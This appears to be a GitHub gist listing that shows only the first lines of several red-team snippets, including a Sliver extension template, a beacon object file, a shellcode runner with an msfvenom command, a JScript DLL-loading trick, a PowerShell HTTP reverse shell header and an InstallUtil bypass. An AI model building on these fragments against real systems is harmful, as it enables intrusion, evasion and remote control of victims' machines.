This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"SliverExtension" :{ | |
"prefix": "sliverext", | |
"body": [ "{", | |
"\"name\": \"$1\",", | |
"\"version\": \"0.0.0\",", | |
"\"command_name\": \"$2\",", | |
"\"extension_author\": \"$3\",", | |
"\"original_author\": \"$3\",", | |
"\"repo_url\": \"N/A\",", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _WIN32_WINNT 0x0502 | |
#define WINVER 0x0502 | |
#include <windows.h> | |
#include <errhandlingapi.h> | |
#include <process.h> | |
#include "beacon.h" | |
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); | |
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr); | |
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.Linq; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
using System.Threading.Tasks; | |
namespace HiddenEventLogs | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import requests | |
import json | |
import time | |
import paramiko | |
from Crypto.PublicKey import RSA | |
from os import chmod | |
public_key_name = "test1.key" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
int main(int argc, char **argv){ | |
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################# | |
# # | |
# Refer to this blog post about what this code is used for: # | |
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
# # | |
################################################################################# | |
import requests | |
import os | |
import psutil |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.ComponentModel; | |
using System.Runtime.InteropServices; | |
namespace ComWithoutRegisteringExample | |
{ | |
internal static class ComHelper | |
{ | |
private delegate int DllGetClassObject(ref Guid clsid, ref Guid iid, [Out, MarshalAs(UnmanagedType.Interface)] out IClassFactory classFactory); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Example Reference: | |
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
// Test | |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
// Change that C:\\Tools to a location you specify, or dynamically find current directory. | |
// ActCTX will search for the DLL in TMP | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
Read And Write Files Over WebDAV Proof Of Concept | |
.PARAMETER Server | |
Listening Server IP Address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sing System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |
NewerOlder